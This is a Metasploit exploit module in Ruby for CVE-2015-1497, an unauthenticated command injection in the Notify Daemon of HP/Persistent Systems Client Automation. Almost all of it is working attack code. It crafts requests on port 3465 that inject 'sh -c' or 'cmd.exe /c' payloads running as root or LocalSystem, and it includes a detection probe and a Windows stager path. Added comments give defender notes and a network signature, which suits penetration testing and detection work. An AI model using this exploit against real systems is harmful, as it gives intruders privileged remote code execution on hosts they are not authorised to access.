GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for CVE-2015-1497 (ZDI-15-038): unauthenticated command
# injection in the Notify Daemon (radexecd.exe) of HP Client Automation /
# Persistent Systems Client Automation. Per the description below, the daemon
# does not authenticate execution requests by default, so a request whose
# command field carries a shell invocation is executed on the host.
#
# Defender notes, derived only from the traffic this module emits:
# - Every request sent here is four NUL-terminated fields in this order:
#   port, user ID, password, command (see #check, #exploit_unix,
#   #execute_command). RPORT defaults to 3465.
# - The injected command field starts with "hide hide" followed by a tab and
#   then `sh -c '...'` (Linux target) or `cmd.exe /c ...` (Windows target);
#   that byte pattern on the daemon's port is a reasonable network-detection
#   signature for this technique.
# - Vendor hardening guidance for the RBAC and Remote Notify features is the
#   URL listed under 'References'.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  # Registers module metadata, targets and options.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HP Client Automation Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability on HP Client Automation, distributed
          actually as Persistent Systems Client Automation. The vulnerability exists in the Notify
          Daemon (radexecd.exe), which doesn't authenticate execution requests by default.

          This module has been tested successfully on HP Client Automation 9.00 on Windows 2003 SP2
          and CentOS 5.
        },
        'Author' => [
          'Ben Turner', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          ['CVE', '2015-1497'],
          ['ZDI', '15-038'],
          ['URL', 'https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features']
        ],
        # Commands run in the daemon's own context: the Windows path submits the
        # request as user ID S-1-5-18 (the well-known LocalSystem SID) and the
        # Linux path as user ID "0" (presumably root) -- see the methods below.
        'Privileged' => true,
        'DefaultOptions' => {
          # Time to wait for a session after the request is sent; the Linux
          # path never reads a reply from the daemon, so this is its only
          # success signal.
          'WfsDelay' => 10
        },
        'Payload' => { 'DisableNops' => true },
        'Targets' => [
          [
            'HP Client Automation 9.0.0 / Linux',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Payload' =>
              {
                # Maximum encoded payload length accepted for this target.
                'Space' => 466,
                'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,
                'Compat' =>
                {
                  'PayloadType' => 'cmd',
                  'RequiredCmd' => 'openssl telnet generic gawk'
                },
                # 0x27 is the single quote: #exploit_unix embeds the payload
                # inside a single-quoted `sh -c '...'` argument, so a quote in
                # the payload would break out of (or truncate) that argument.
                'BadChars' => "\x27"
              }
            }
          ],
          [
            'HP Client Automation 9.0.0 / Windows',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2014-01-02',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Default Notify Daemon port.
        Opt::RPORT(3465)
      ]
    )

    # The Windows path hard-codes the :vbs stager flavor in #exploit and does
    # not expose a decoder choice, so neither option is meaningful to the user.
    deregister_options('CMDSTAGER::FLAVOR')
    deregister_options('CMDSTAGER::DECODER')
  end

  # Probes the daemon without injecting a shell command: the request carries a
  # random user ID and password and the bare command token "hide" (no
  # tab-separated `sh -c` / `cmd.exe` suffix as in the exploit paths, so this
  # appears not to run anything on the target -- confirm against the daemon).
  #
  # A reply whose first byte is 0 means the daemon accepted an unauthenticated
  # request from arbitrary credentials; that is reported as Detected rather
  # than Vulnerable because code execution is not confirmed. No reply, or a
  # non-zero status byte, is reported as Safe.
  #
  # @return [Exploit::CheckCode]
  def check
    connect
    sock.put("\x00") # port (empty field)
    sock.put("#{rand_text_alphanumeric(rand(4..6))}\x00") # user ID (random, 4-6 chars)
    sock.put("#{rand_text_alpha(rand(4..6))}\x00") # password (random, 4-6 chars)
    sock.put("hide\x00") # command
    res = sock.get_once
    disconnect

    # First byte of the reply read as an unsigned 8-bit status; 0 = accepted.
    if res && res.unpack('C')[0] == 0
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Dispatches on the selected target's platform: Windows goes through the
  # CmdStager (VBS flavor, 290-byte lines, delivered via #execute_command),
  # Linux sends the encoded cmd payload directly via #exploit_unix.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the platform is neither
  #   'win' nor 'unix'
  def exploit
    case target['Platform']
    when 'win'
      print_status('Exploiting Windows target...')
      # linemax bounds each stager command line handed to #execute_command.
      execute_cmdstager({ flavor: :vbs, linemax: 290 })
    when 'unix'
      print_status('Exploiting Linux target...')
      exploit_unix
    else
      fail_with(Failure::NoTarget, 'Invalid target')
    end
  end

  # Linux target: sends one request whose command field is "hide hide", a tab,
  # and `sh -c '<payload>'`. Backslashes in the encoded payload are doubled
  # (each `\` becomes `\\`) before it is placed inside the single-quoted
  # argument. Unlike #execute_command this path reads no status byte back; the
  # session (or its absence after WfsDelay) is the only outcome signal.
  def exploit_unix
    connect
    sock.put("\x00") # port (empty field)
    sock.put("0\x00") # user ID ("0"; presumably uid 0 / root -- confirm)
    sock.put("#{rand_text_alpha(rand(4..6))}\x00") # password (random, not checked by the daemon)
    sock.put("hide hide\x09sh -c '#{payload.encoded.gsub(/\\/, '\\\\\\\\')}'\x00") # command, here commands can be injected
    disconnect
  end

  # CmdStager callback for the Windows target: invoked by execute_cmdstager
  # with each stager command line. Sends one request per call whose command
  # field is "hide hide", a quoted tab, and `cmd.exe /c <cmd>&`; the trailing
  # `&` presumably terminates the injected command before anything the daemon
  # appends -- confirm. The user ID S-1-5-18 is the LocalSystem SID.
  #
  # @param cmd [String] one stager command line to run on the target
  # @param _opts [Hash] CmdStager options (unused here)
  # @raise [Msf::Exploit::Failed] via fail_with when the daemon does not reply
  #   or its first status byte is non-zero
  def execute_command(cmd, _opts = {})
    connect
    sock.put("\x00") # port (empty field)
    sock.put("S-1-5-18\x00") # user ID (LocalSystem SID)
    sock.put("#{rand_text_alpha(rand(4..6))}\x00") # password (random, not checked by the daemon)
    sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected
    res = sock.get_once
    disconnect
    # Same status convention as #check: first byte 0 means the request was accepted.
    unless res && res.unpack('C')[0] == 0
      fail_with(Failure::Unknown, 'Something failed executing the stager...')
    end
  end
end